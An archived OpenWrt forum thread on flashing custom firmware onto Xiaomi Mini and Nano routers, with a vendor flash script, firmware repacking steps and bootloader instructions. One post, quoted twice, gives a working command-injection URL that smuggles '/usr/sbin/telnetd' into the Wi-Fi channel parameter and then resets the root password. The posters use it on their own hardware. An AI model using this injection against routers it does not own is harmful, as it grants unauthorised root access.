OpenWrt Forum Archive

Topic: Installing OpenWrt in Xiaomi Wifi Mini

The content of this topic has been archived between 8 Feb 2018 and 5 May 2018. Unfortunately there are posts – most likely complete pages – missing.

Hello

Can someone translate and try this ? http://admin-to-admin.info/blog/proshiv … a-padavan/

https://gitlab.com/Track/xrmwrt

Edit:

https://www.youtube.com/watch?v=Dv0gfVqFLYU

https://yadi.sk/d/nEQ2JO6LiXFNm  Inside instructions in file .txt ( use google translate)

The last version (?) is this : http://routerclub.ru/upload/padavan/nig … /xrm_base/

Easy, follow the instructions on this site: http://wifika.ru/proshivka-routera-xiao … -asus.html

Edit:

Wow, works greate. English language.       
Operation Mode: AP-Client + AP

http://imgur.com/BMKOpFF

JM

Portugal

(Last edited by jjmmdanp on 6 Dec 2015, 21:08)

I ordered Xiaomi mini router and nano (youth) routers from Aliexpress. Now ugraded OpenWrt to mini. I don't wan't to open nano, because I am not a HW guy.

I opened xiaomi nano firmware fs and seems that there is /bin/flash.sh file. Is that common OpenWrt file or specific Xiaomi file? Maybe this file is called from router settings page?
Maybe it would be possible to modify flash.sh script in a way that it accept PandoraBox-ralink-mt7628-xiaomi-r1cl-squashfs-sysupgrade-r1468-20151001.bin file.

flash.sh file:

#!/bin/sh
#

. /lib/upgrade/common.sh

klogger(){
    local msg1="$1"
    local msg2="$2"

    if [ "$msg1" = "-n" ]; then
        echo  -n "$msg2" >> /dev/kmsg 2>/dev/null
    else
        echo "$msg1" >> /dev/kmsg 2>/dev/null
    fi

    return 0
}

hndmsg() {
    if [ -n "$msg" ]; then
        echo "$msg" >> /dev/kmsg 2>/dev/null
        if [ `pwd` = "/tmp" ]; then
            rm -rf $filename 2>/dev/null
        fi
        exit 1
    fi
}

upgrade_uboot() {
    if [ -f uboot.bin ]; then
        klogger -n "Burning uboot..."
        mtd write uboot.bin Bootloader >& /dev/null
        if [ $? -eq 0 ]; then
            klogger "Done"
        else
            klogger "Error"
            exit 1
        fi
    fi
}

upgrade_firmware() {
    if [ -f firmware.bin ]; then
        klogger -n "Burning firmware..."
        mtd -r write firmware.bin OS1 >& /dev/null
        if [ $? -eq 0 ]; then
            klogger "Done"
        else
            klogger "Error"
            exit 1
        fi
    fi
}


if [ $# = 0 ] || [ $# -gt 2 ] ; then
    klogger "USAGE: $0 factory.bin 0(0:reboot, 1:don't reboot)"
    exit 1;
fi

#check pid exist
pid_file="/tmp/pid_xxxx"
if [ -f $pid_file ]; then
    exist_pid=`cat $pid_file`
    if [ -n $exist_pid ]; then
        kill -0 $exist_pid 2>/dev/null
        if [ $? -eq 0 ]; then
            klogger "Upgrading, exit... $?"
            exit 1
        else
            echo $$ > $pid_file
        fi
    else
        echo $$ > $pid_file
    fi
else
    echo $$ > $pid_file
fi

_ver=`cat /usr/share/xiaoqiang/xiaoqiang_version`
klogger "Begin Ugrading..., current version: $_ver"

echo 3 > /proc/sys/vm/drop_caches
sync

[ -f $1 ] || msg="dir: $1 is not existed, upgrade failed"
hndmsg

dir_name=`dirname $1`
klogger "Change Dir to: $dir_name"
cd $dir_name

filename=`basename $1`
[ -f $filename ] || msg="file: $filename is not existed, upgrade failed"
hndmsg

klogger -n "Verify Image: $filename..."
mkxqimage -v $filename || msg="Check Failed!!!"
hndmsg
klogger "Checksum O.K."
echo 32 > /proc/sys/vm/pagecache_limit_mb

wifi down
rmmod mt7628


if [ -f "/etc/init.d/sysapihttpd" ] ;then
    /etc/init.d/sysapihttpd stop 2>/dev/null
fi

if [ $dir_name != "/tmp" ]; then
    klogger "Change Dir to /tmp"
        cp $1 /tmp
        cd /tmp
fi

# gently stop pppd, let it close pppoe session
ifdown wan
timeout=5
while [ $timeout -gt 0 ]; do
    pidof pppd >/dev/null || break
    sleep 1
    let timeout=timeout-1
done

# clean up upgrading environment
# call shutdown scripts with some exceptions
wait_stat=0
klogger "Calling shutdown scripts"
for i in /etc/rc.d/K*; do
    # filter out K01reboot-wdt and K99umount
    echo "$i" | grep -q '[0-9]\{1,100\}reboot-wdt$'
    if [ $? -eq 0 ]
    then
        klogger "$i skipped"
        continue
    fi
    echo "$i" | grep -q '[0-9]\{1,100\}umount$'
    if [ $? -eq 0 ]
    then
        klogger "$i skipped"
        continue
    fi

    if [ ! -x "$i" ]
    then
        continue
    fi

    # wait for high-priority K* scripts to finish
    echo "$i" | grep -qE "K9"
    if [ $? -eq 0 ]
    then
        if [ $wait_stat -eq 0 ]
        then
            wait
            sleep 2
            wait_stat=1
        fi
        $i shutdown 2>&1
    else
        $i shutdown 2>&1 &
    fi
done

# try to kill all userspace processes
# at this point the process tree should look like
# init(1)---sh(***)---flash.sh(***)
for i in $(ps w | grep -v "flash.sh" | grep -v "/bin/ash" | grep -v "PID" | awk '{print $1}'); do
        if [ $i -gt 100 ]; then
            kill -9 $i 2>/dev/null
        fi
done

gpio 1 1
gpio 3 1
gpio l 44 2 2 1 0 4000 #led yellow flashing

#update nvram setting when upgrading
if [ "$2" = "1" ]; then
    nvram set restore_defaults=1
    klogger "Restore defaults is set."
else
    nvram set restore_defaults=2
fi
nvram set flag_flash_permission=0
nvram set flag_ota_reboot=1
nvram set flag_upgrade_push=1
nvram commit

# tell server upgrade is finished
uci set /etc/config/messaging.deviceInfo.UPGRADE_STATUS_UPLOAD=0
uci commit
klogger "messaging.deviceInfo.UPGRADE_STATUS_UPLOAD=`uci get /etc/config/messaging.deviceInfo.UPGRADE_STATUS_UPLOAD`"
klogger "/etc/config/messaging : `cat /etc/config/messaging`"

# prepare the minimum working environment
mount -o remount,size=100% /tmp
lib_list="/lib/ld-uClibc.so.0 /lib/libc.so.0 /lib/libdl.so.0 /lib/libm.so.0 \
/lib/libubox.so /lib/libcrypt.so.0 /lib/libgcc_s.so.1 /usr/lib/libcrypto.so.1.0.0"
bin_list="/bin/busybox /bin/ash /bin/sh /bin/cat /bin/mount /bin/umount \
/bin/mkxqimage /sbin/reboot /usr/sbin/nvram"

mkdir -p /tmp/update_environment/lib
mkdir -p /tmp/update_environment/bin
mkdir -p /tmp/update_environment/proc
mkdir -p /tmp/update_environment/dev
mkdir -p /tmp/update_environment/usr/share/xiaoqiang/
for lib in $lib_list
do
    if [ -e $lib ]
    then
        cp -L $lib /tmp/update_environment/lib
    else
        # in case the lib_list is outdated, abort early
        msg="Lib $lib not found"
        hndmsg
        reboot -f
    fi
done
for bin in $bin_list
do
    if [ -e $bin ]
    then
        cp -P $bin /tmp/update_environment/bin
    else
        # in case the bin_list is outdated, abort early
        msg="Bin $bin not found"
        hndmsg
        reboot -f
    fi
done
cp /usr/share/xiaoqiang/public.pem /tmp/update_environment/usr/share/xiaoqiang/
mv $filename /tmp/$filename
pivot /tmp/update_environment /old_root && {
    umount -l /old_root
    klogger "Switch to ram-based rootfs"
}

klogger -n "Begin Upgrading and Rebooting..."
mkxqimage -w /tmp/$filename || msg="Upgrade Failed!!!"
hndmsg

(Last edited by UbuntuInMacBook on 6 Dec 2015, 23:45)

The problem is how to call that function

netomx wrote:

The problem is how to call that function

My assumption was that this function is called from configuration web page, but before that it verify file. Maybe verify function is also in this same script.
Now I got error "Couldn't verify file".

If that is true, then just modify script in the binary file and update this first to router.

(Last edited by UbuntuInMacBook on 7 Dec 2015, 00:21)

Or just add crontab wich run wget and then flash binary... just easy smile
1) cd /tmp
2) wget http://downloads.openwrt.org.cn/Pandora … 151001.bin
3) mtd -r write PandoraBox-ralink-mt7628-xiaomi-r1cl-squashfs-sysupgrade-r1468-20151001.bin OS1

What do you think could it work?

I believe you've been looking in the wrong place wink

1. /usr/sbin/checkupgrade.lua
2. /usr/lib/lua/xiaoqiang/util/XQSysUtil.lua:verifyImage()
3. /usr/lib/lua/xiaoqiang/util/XQSysUtil.lua:getMiscHardwareInfo()

Which fetches

4. option verify 'cd /tmp;mkxqimage -v ', from uci/misc config

And runs the "mkxqimage -v" file. '-v' for verify (or Vendetta!) I guess.

From that point on is easy, replace /bin/mkxqimage or disassemble wink

[EDIT]
By the way "nvram set ssh_en 1" is the ssh enabling command.

(Last edited by santamanno on 9 Dec 2015, 16:11)

I bought this router recently and immediately re-flashed it with the most recent stable (Chaos Calmer). At first glance all seemed to work with no errors appearing but I experienced the performance issues others had described before (weak signal, slow speeds, connection dying off when idle and requiring reconnect). While looking around to see what solutions are available I found this thread. Thanks to all the contributors for all the helpful bits of information.

To share my experience, while OpenWrt performance seems to be marginally better with the trunk branch (Designated Driver), after some patches were committed, it's still a far cry from what the device should be capable of.

In a very unscientific way, I compared some of the firmwares circulating around. The results, in the order of decreasing performance, are as follows:

  1. PandoraBox r1216 (2015-07-21) (source)

  2. OpenWrt w/RSSN Patch (2015-12-06) (source)

  3. Padavan (2015-11-13) (source)

  4. OpenWrt Designated Driver (2015-11-22)

  5. OpenWrt Chaos Calmer 15.05 (2015-09-14)

To quantify, OpenWrt's performance seems to be at around 33% to 50% of Pandora Box's in terms of speed. I understand this is due to MediaTek (RaLink)'s disregard for the open source community. It would be really great if this gap is eventually bridged though.

As an aside, upgrading from stable to trunk I was cut off from SSH in a weird way, which didn't happen with another access point I was upgrading at the same time (TL-WR1043NDv1). Perhaps this was due to the device name change and that I chose to preserve the settings but I didn't investigate the exact reason so it's just a rough guess.

Edit / Question: Has anyone been able to successfully use failsafe mode to login over SSH (or Telnet) with this device? For me, it boots into failsafe mode correctly (confirmed by the rapid LED flashing) and the first UDP packet is received too but then it doesn't respond to pings nor does it accept any SSH connections (also checked Telnet just in case). I tried with each of the 3 Ethernet ports, starting from a separate boot, and also confirmed the failsafe mode works fine with another device I have access to (TL-WR1043NDv1) to exclude a problem with my setup as a potential cause. This happens with the latest trunk (r47548 of 2015-11-22), haven't checked other versions. Perhaps the cause is similar to this resolved bug, as this router has some ports not connected to any physical interface?

(Last edited by StrangeOrange on 10 Dec 2015, 09:57)

StrangeOrange wrote:

Edit / Question: Has anyone been able to successfully use failsafe mode to login over SSH (or Telnet) with this device? For me, it boots into failsafe mode correctly (confirmed by the rapid LED flashing) and the first UDP packet is received too but then it doesn't respond to pings nor does it accept any SSH connections (also checked Telnet just in case).?

I see this exact same behavior.

In case you want to skip all the Xiaomi download etc, here are some instructions to flash directly OpenWRT/PandoraBox on stock firmware via code injection bug.

NOTE
This method has been successfully tested on
-> Xiaomi Mini - Stock firmware v2.6.17
-> Xiaomi Lite aka "Youth" or "Nano" - Stock firmware v2.2.8

STEPS
1) Power on and setup the Xiaomi router until it reboots and gets IP address 192.168.31.1
2) Log-in into the router and grab the value of the stok URL parameter (for instance: "9c2428de4d17e2db7e5a6a337e6f57a3")
3) Replace the <STOK> placeholder and load this URL in your browser or curl, this will start telnetd on the router:

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd

It should spit out some wifi error code, that is ok, don't worry.

4) Replace the <STOK> placeholder, the current password and the desired root password and load this URL in your browser or curl, this will set the router root password

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqsystem/set_name_password?oldPwd=<CURRENTPASS>&newPwd=<NEWPASS>

It should spit out: {"code":0}

5) Telnet to the router, enter user root and NEWPASS chosen above.

6) wget your favourite .bin and flash with mtd -r write firmware.bin OS1

7) Router reboots wink

Hope it helps, just wanted to give back my two cents to the community.

(Last edited by santamanno on 13 Dec 2015, 22:09)

very good, between 5 and 6 you can run:

nvram set uart_en=1
nvram commit

to enable serial console.

(Last edited by anarchy99 on 12 Dec 2015, 20:25)

StrangeOrange wrote:

Edit / Question: Has anyone been able to successfully use failsafe mode to login over SSH (or Telnet) with this device? For me, it boots into failsafe mode correctly (confirmed by the rapid LED flashing) and the first UDP packet is received too but then it doesn't respond to pings nor does it accept any SSH connections (also checked Telnet just in case). I tried with each of the 3 Ethernet ports, starting from a separate boot, and also confirmed the failsafe mode works fine with another device I have access to (TL-WR1043NDv1) to exclude a problem with my setup as a potential cause. This happens with the latest trunk (r47548 of 2015-11-22), haven't checked other versions. Perhaps the cause is similar to this resolved bug, as this router has some ports not connected to any physical interface?

Don't you need also support in U-BOOT for this?

Is there anyway to enable vlan tagging up to 4096 ?
My ISP needs vlan 500 for connecting to internet

(Last edited by zhuoyang on 13 Dec 2015, 11:04)

santamanno wrote:

...

This is an amazing hack, wish I knew about it before, as I needed to unlock it the pedestrian way. If you could just specify the version it worked with, as I think they'll patch it up eventually.

Benik3 wrote:
StrangeOrange wrote:

Edit / Question: Has anyone been able to successfully use failsafe mode to login over SSH (or Telnet) with this device? For me, it boots into failsafe mode correctly (confirmed by the rapid LED flashing) and the first UDP packet is received too but then it doesn't respond to pings nor does it accept any SSH connections (also checked Telnet just in case). I tried with each of the 3 Ethernet ports, starting from a separate boot, and also confirmed the failsafe mode works fine with another device I have access to (TL-WR1043NDv1) to exclude a problem with my setup as a potential cause. This happens with the latest trunk (r47548 of 2015-11-22), haven't checked other versions. Perhaps the cause is similar to this resolved bug, as this router has some ports not connected to any physical interface?

Don't you need also support in U-BOOT for this?

I don't see why that should be the case. Basically the bootloader just loads the kernel, which then takes full control. OpenWrt documentation does not mention such a precondition anywhere and my TL-WR1043NDv1 with stock bootloader can be accessed in failsafe mode without problems. Further, the bootloader cannot distinguish between failsafe and regular mode because which mode the device will boot into is determined by the press of a button after the bootloader has already completed, so if this were caused by the bootloader, the network would need to be down all the time, which is not the case. I might of course be wrong but based on what I know I find it hard to believe. Is there any reference to support it?

Talking about bootloaders I found a great one called Breed (download - will always link to latest version, description - in Chinese only). It can do a lot but the most basic way to use it is: flash it, power off, hold the reset button while powering back on, plug the Ethernet cable, you'll get a DHCP lease (so no need to set the IP address manually) and can then go to http://192.168.1.1/ to flash any firmware. Apparently replacing the stock bootloader is recommended because flashing a firmware larger than 8 MiB has the potential to overwrite the serial number, and if that happens then if the stock firmware is reflashed there will be no access to SSH anymore (the above hack posted by santamanno excepted). Caveat: the interface is only in Chinese too.

As for the failsafe issue, the documentation does say that the WAN port must be disconnected for it to work, and since this device has a complicated port setup, another explanation might be that the device mistakenly treats one of the always-on ports as the WAN port and, thinking it's connected, cuts off all access. One thing I read on some Chinese forum (can't find the link now) hinted at something like that interfering with failsafe, mentioning to only ever use the middle port for it (LAN port #1) but that did not work for me either. (To be absolutely clear about all the circumstances, all my failsafe experiments were done with the stock bootloader, so a custom bootloader issue is not a factor either.)

(Last edited by StrangeOrange on 13 Dec 2015, 13:54)

It was just an idea, I know that the original bootloader is little cropped (e.g. it doesn't support serial in default).

Anyway thanks for the Breed! smile
Another "full" bootloader could be also the one from WiTi (but it will probably need to build it specialy for MiWifi)
https://mqmaker.com/
http://ftp.mqmaker.com/WiTi/
https://github.com/mqmaker/witi-uboot

(Last edited by Benik3 on 13 Dec 2015, 14:22)

StrangeOrange wrote:
santamanno wrote:

...

This is an amazing hack, wish I knew about it before, as I needed to unlock it the pedestrian way. If you could just specify the version it worked with, as I think they'll patch it up eventually.

Thank you.

The funny thing is that I actually found this on the Xiaomi Lite (aka Youth/Nano), because I did not want to crack it open right away for serial flashing.

For the sake of completeness, I've just downloaded both latest stock firmwares and uncompressed them and they both still contain the bug:

Xiaomi Mini v2.6.17
Xiaomi Lite aka "Youth" or "Nano" v2.2.8

IMHO they need heavy patching, there are plenty of other "backdoors" as far as I can tell wink

Long post. Scroll down to the first heading to skip the non-technical part.

As much as I'd love to use bleeding-edge OpenWrt proper on this router, I find the Wi-Fi performance too disappointing compared to Pandora Box, so I'm reluctantly warming up towards the idea of staying with the latter for the time being.

Pandora Box is a partly-relabeled, Chinese fork of an older OpenWrt release (Barrier Breaker 14.07) that apparently includes some changes to the Wi-Fi driver that make its performance better. To the extent that I know of, the source code has not been made available, so the driver changes cannot be ported back to OpenWrt proper.

Pandora Box also includes nearly 200 add-on packages not present in the default OpenWrt installation, some of which I have little use for and would not want clogging up the limited resources of the router (examples include stuff related to bypassing the Internet censorship in China, etc. or a driver for some specific Huawei hardware). I also feel every such package can become a potential security problem, especially as they come from on outdated fork that is not being updated often.

The packages can be "uninstalled" but that does not mean they actually disappear from the flashed firmware and free up the space, which is what I'd ideally want to happen. What I'm up to then is getting rid of them by editing the *.bin file before flashing it.

So far I haven't made any changes and I'm not sure how much of the plan I'll be carrying out, as it is a time-consuming endeavor but I wanted to share the editing method that I have just confirmed to work:


Making changes to OpenWrt read-only filesystem
by editing the sysupgrade .bin before flashing the firmware

I'm doing this to modify the closed-source Pandora Box binary firmware for Xiaomi MiWiFi Mini but this method can be easily adopted to other scenarios.

  • Download the latest Pandora Box version for the Xiaomi MiWiFi Mini. At the moment it is:
    PandoraBox-ralink-mt7620-xiaomi-mini-squashfs-sysupgrade-r1216-20150721.bin
    MD5 Sum: f65a34a40c29eddc04989ad95458c1f9

  • For brevity, rename the file to fw.bin.

  • The structure of the file is as follows:
    To calculate the size, subtract each offset from the one that immediately follows it.
    If you are working with a different file, you need to manually analyze it at this point with a hex editor.

Offset   Size     Object    Remarks
      0  1196846  Kernel
1196846  6509218  SquashFS  Begins with "hsqs"
7706064   158260  Padding   Consists of 0xFF with occasional 0xDEADC0DE
7864324           EOF
  • Split the file into parts. The syntax using dd(1):
    You could also try split(1), perhaps csplit(1), or an interactive hex editor.


    dd if=fw.bin of=fw_kernel.bin bs=1 count=1196846
    dd if=fw.bin of=fw_fs.bin bs=1 skip=1196846 count=6509218
    dd if=fw.bin of=fw_padding.bin bs=1 skip=7706064 count=158260


  • Optional: Check to make sure we got the numbers right:


    cat fw_kernel.bin fw_fs.bin fw_padding.bin | cmp -l fw.bin


  • Optional: Check the filesystem metadata (superblock) and save a list of all files alongside their permissions.


    unsquashfs -s fw_fs.bin
    unsquashfs -ll fw_fs.bin >fw_fs_ls.txt


  • Unpack the filesystem:


    unsquashfs -d fw_fs fw_fs.bin


  • The partition has been unpacked into the fw_fs directory. You can now remove, insert or edit any of the files there.


    cd fw_fs
    [Add your customizations here]
    cd ..


  • Repack the filesystem back into the archive:
    The part marked in green will generally not be necessary unless you unpacked the archive to a filesystem that cannot store device files. It is harmless to leave it though, as if the device files are already present it will only raise a warning.


    mksquashfs fw_fs fw_fs_mod.bin -nopad -noappend -root-owned -comp xz -Xpreset 9 -Xe -Xlc 0 -Xlp 2 -Xpb 2 -b 256k -p '/dev d 755 0 0' -p '/dev/console c 600 0 0 5 1'


  • Alternative: The above command requires a patched version of mksquashfs (comes with the OpenWrt build environment). The regular version will not accept the compression settings highlighted in blue. If you only have this version like I did, omitting those parameters will still yield a working result although with a slightly larger file: (~100 KiB in my case).
    Open question: perhaps the dictionary size should be adjusted with -Xdict-size.


    mksquashfs fw_fs fw_fs_mod.bin -nopad -noappend -root-owned -comp xz -b 256k -p '/dev d 755 0 0' -p '/dev/console c 600 0 0 5 1'


  • Merge everything back together into a single flashable file:
    Copying over the old padding is the lazy way of doing things, this part could be improved upon. For starters, according to a casual glance at the source code the only necessary thing that needs to be present is a single instance of 0xDEADC0DE to mark the beginning of the jffs2 partition, other than that the padding is there only to workaround some bootloader problems, which might not even be present on this device. A new padding can also be generated with the padjffs2 tool from the OpenWrt build environment. It also appears that the partition size should not exceed 8 MiB, so if you add a lot of files, you might want to adjust the padding accordingly.


    cat fw_kernel.bin fw_fs_mod.bin fw_padding.bin > fw_mod.bin


  • Reflash the new firmware, fw_mod.bin.
    In my case, I needed to discard the old settings to make it boot properly.


    sysupgrade -n fw_mod.bin


Thanks for bearing with me. Hope someone finds the above useful. Note that while it works for me, all the usual disclaimers apply: do any of the above at your own peril.

I found the following resources very helpful in the course of figuring out what to do:

Great work. Agromne spocibo.

(Last edited by augustus_meyer on 14 Dec 2015, 10:32)

This is awesome. Thanks!

santamanno wrote:

In case you want to skip all the Xiaomi download etc, here are some instructions to flash directly OpenWRT/PandoraBox on stock firmware via code injection bug.

NOTE
This method has been successfully tested on
-> Xiaomi Mini - Stock firmware v2.6.17
-> Xiaomi Lite aka "Youth" or "Nano" - Stock firmware v2.2.8

STEPS
1) Power on and setup the Xiaomi router until it reboots and gets IP address 192.168.31.1
2) Log-in into the router and grab the value of the stok URL parameter (for instance: "9c2428de4d17e2db7e5a6a337e6f57a3")
3) Replace the <STOK> placeholder and load this URL in your browser or curl, this will start telnetd on the router:

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd

It should spit out some wifi error code, that is ok, don't worry.

4) Replace the <STOK> placeholder, the current password and the desired root password and load this URL in your browser or curl, this will set the router root password

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqsystem/set_name_password?oldPwd=<CURRENTPASS>&newPwd=<NEWPASS>

It should spit out: {"code":0}

5) Telnet to the router, enter user root and NEWPASS chosen above.

6) wget your favourite .bin and flash with mtd -r write firmware.bin OS1

7) Router reboots wink

Hope it helps, just wanted to give back my two cents to the community.

Excellent, this worked for me
Big thanks for you santamanno!!
don't know how you found this injection bug, it works for me  smile

santamanno wrote:

In case you want to skip all the Xiaomi download etc, here are some instructions to flash directly OpenWRT/PandoraBox on stock firmware via code injection bug.

NOTE
This method has been successfully tested on
-> Xiaomi Mini - Stock firmware v2.6.17
-> Xiaomi Lite aka "Youth" or "Nano" - Stock firmware v2.2.8

STEPS
1) Power on and setup the Xiaomi router until it reboots and gets IP address 192.168.31.1
2) Log-in into the router and grab the value of the stok URL parameter (for instance: "9c2428de4d17e2db7e5a6a337e6f57a3")
3) Replace the <STOK> placeholder and load this URL in your browser or curl, this will start telnetd on the router:

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd

It should spit out some wifi error code, that is ok, don't worry.

4) Replace the <STOK> placeholder, the current password and the desired root password and load this URL in your browser or curl, this will set the router root password

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/xqsystem/set_name_password?oldPwd=<CURRENTPASS>&newPwd=<NEWPASS>

It should spit out: {"code":0}

5) Telnet to the router, enter user root and NEWPASS chosen above.

6) wget your favourite .bin and flash with mtd -r write firmware.bin OS1

7) Router reboots wink

Hope it helps, just wanted to give back my two cents to the community.

mikeoke wrote:

Excellent, this worked for me
Big thanks for you santamanno!!
don't know how you found this injection bug, it works for me  smile

You're welcome! I had to unpack the firmware and look through the LUA code until I found a crack wink

hey there, i have a xiaomi mini router also, i post to let you know about a problem (about my ip cam (the Yi IP cam normal edition) and my PC) i've encountered with openwrt 15.05/trunk

https://forum.openwrt.org/viewtopic.php?id=61567

if someone encounter the same issue maybe it can help.

(Last edited by xiaxia on 18 Dec 2015, 09:38)

compiled r47929 and running without problems. switch detected as usual.

i tried original fw v2.6.17 and it looks like 5GHz signal strength is the same as with openwrt so they must screwed up something too because it was strong as the 2.4GHz with older firmwares.

another thing when flashing openwrt using santamanno's method you won't easily wget image if the router is not connected to the internet unless you run local server, so i figured you can simply scp image using ssh.

(Last edited by anarchy99 on 21 Dec 2015, 02:49)

Is the stock firmware u-boot locked, or can flash Breed directly?

roger_ wrote:

Is the stock firmware u-boot locked, or can flash Breed directly?

It can be flashed directly. From the original description:

刷入方式
跟 U-Boot 相同的刷入方法:

  • 从 PandoraBox U-Boot 中刷入

  • 在固件中使用 mtd 命令刷入

  • 在 U-Boot TTL 中刷入

  • 用编程器刷入

In English:

Flashing Method
The ways to flash are the same as for U-Boot:

  • Flash from PandoraBox's U-Boot

  • From inside the firmware, using the mtd command

  • Using TTL with U-Boot

  • Flash using a [hardware] programming device

PandoraBox U-Boot is another custom bootloader, available here, which would already need to be present first for this method to be available. The latter two methods require extra hardware. I used the second way:

  • cd /tmp

  • wget http://breed.hackpascal.net/latest/bree … i-mini.bin

  • wget http://breed.hackpascal.net/latest/md5sum.txt

  • cat md5sum.txt | fgrep xiaomi

  • md5sum breed-mt7620-xiaomi-mini.bin
    Manually compare the MD5 sums. Only proceed if they match. Otherwise, re-download.

  • cat /proc/mtd
    Find out the bootloader partition. If flashing from the stock firmware, this will be mtd1, named "Bootloader". If flashing from PandoraBox, it'll be mtd0, named "u-boot". Other firmwares might have different variations.

  • mtd write breed-mt7620-xiaomi-mini.bin mtdX
    Where X is the partition number. Not using the -r (automatic reboot) switch gives you a chance to recover if something goes wrong, in which case do not reboot but reflash again, perhaps reverting to the stock bootloader (of which you might want to make a backup beforehand, not covered here).

Disclaimer: Changing the bootloader has the potential to brick your device. While the procedure as described worked for me, it is possible that something might go wrong. Anything you decide to do, you are doing at your own risk.

Note that once you have Breed flashed in, you can flash any other bootloader from inside its Web-based interface.

A little more about Breed:

  • For people who don't like to hold the Reset switch, note that there is a utility that will trigger the bootloader console remotely: with the router powered off and connected to your computer through Ethernet, run the program, press the only button and then power on the router. The message in the program window will change once the bootloader console is active. Download BreedEnter.exe (hover over the file and click on the down arrow), requires the WinPCap library.

  • Apart from the web console, there is also a Telnet interface. List of available commands (in Chinese) or type help.

On an unrelated note, using the method I described above I made some changes to the filesystem inside PandoraBox binary image, making it basically like the vanilla OpenWrt (removing China-specific stuff, translations, not widely-used packages, reverting most of the interface changes to the OpenWrt defaults; basically making it more or less like the stock OpenWrt with their WiFi optimizations while keeping the more useful packages that were already installed). I can share the process, patch set and perhaps the result: if anyone is interested, let me know (otherwise I wouldn't want to clog up the forum).

Shared now, get it here if interested.

(Last edited by StrangeOrange on 8 Jan 2016, 15:44)